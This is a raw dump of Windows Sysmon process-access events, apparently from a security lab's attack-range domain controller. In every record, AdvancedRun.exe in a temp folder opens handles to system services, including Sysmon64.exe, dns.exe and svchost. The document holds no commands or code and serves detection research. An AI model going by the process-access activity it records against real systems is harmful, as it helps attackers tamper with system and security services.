20:15:10.554{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075958Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.554{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075957Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.553{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075956Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.553{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075955Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.553{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075954Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.553{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075953Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.553{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075952Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.553{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075951Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.553{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004075950Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.552{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075949Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.552{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075948Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.552{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075947Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.552{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075946Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.552{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075945Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.552{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075944Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.552{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004075943Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.551{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004075942Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 